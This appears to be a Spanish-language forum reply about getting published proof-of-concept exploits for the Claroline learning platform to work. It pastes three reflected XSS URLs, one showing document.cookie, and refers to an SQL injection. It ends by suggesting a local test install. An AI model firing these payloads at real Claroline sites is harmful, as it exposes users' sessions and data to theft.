Por otra parte... has probado los otros POC's de XSS? si funciona el alert debería funcionar el sql injection digo yo
Código:
Cross-site scripting proof of concepts:
http:///www.example.com/claroline/tracking/toolaccess_details.php?tool=%3Cscript%3Ealert('xss');%3C/script%3E
http:///www.example.com/claroline/tracking/user_access_details.php?cmd=doc&data=%3Cscript%3Ealert('xss');%3C/script%3E
http:///www.example.com/claroline/calendar/myagenda.php?coursePath=%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Igual está parcheado... a lo mejor ha cambiado las líneas vulnerables y puede parecer que es de esa version aunque no lo sea. No sé pero como ha dicho blankdemon lo mejor sería probarlo en local, instalando el caroline en tu maquina y probarlo... así sabes qué es lo que falla, si el SQL injection o está parcheado...
Saludos